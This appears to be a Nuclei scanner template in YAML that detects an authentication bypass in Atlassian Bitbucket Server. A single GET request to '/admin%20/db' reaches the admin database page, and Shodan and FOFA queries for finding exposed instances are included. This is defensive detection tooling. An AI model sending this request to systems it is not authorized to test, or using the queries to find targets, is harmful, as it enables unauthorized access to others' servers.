39 lines
1.3 KiB
YAML
39 lines
1.3 KiB
YAML
id: bitbucket-auth-bypass
|
|
|
|
info:
|
|
name: Bitbucket Server > 4.8 - Authentication Bypass
|
|
author: DhiyaneshDk
|
|
severity: critical
|
|
description: |
|
|
There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
|
|
classification:
|
|
cpe: cpe:2.3:a:atlassian:bitbucket_data_center:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: atlassian
|
|
product: bitbucket_data_center
|
|
shodan-query: title:"Log in - Bitbucket"
|
|
fofa-query: title="Log in - Bitbucket"
|
|
tags: misconfig,atlassian,bitbucket,auth-bypass
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin%20/db"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<h2>Database</h2>"
|
|
- "Migrate database"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100fdf192a557551617872b74732ff32d5520c2e9eed55eeedc06a774416693c05e022038eeaf8290244b3eb3f4e1fde16811b08b9e2e133b60be833551da52593f990c:922c64590222798bb761d5b6d8e72950 |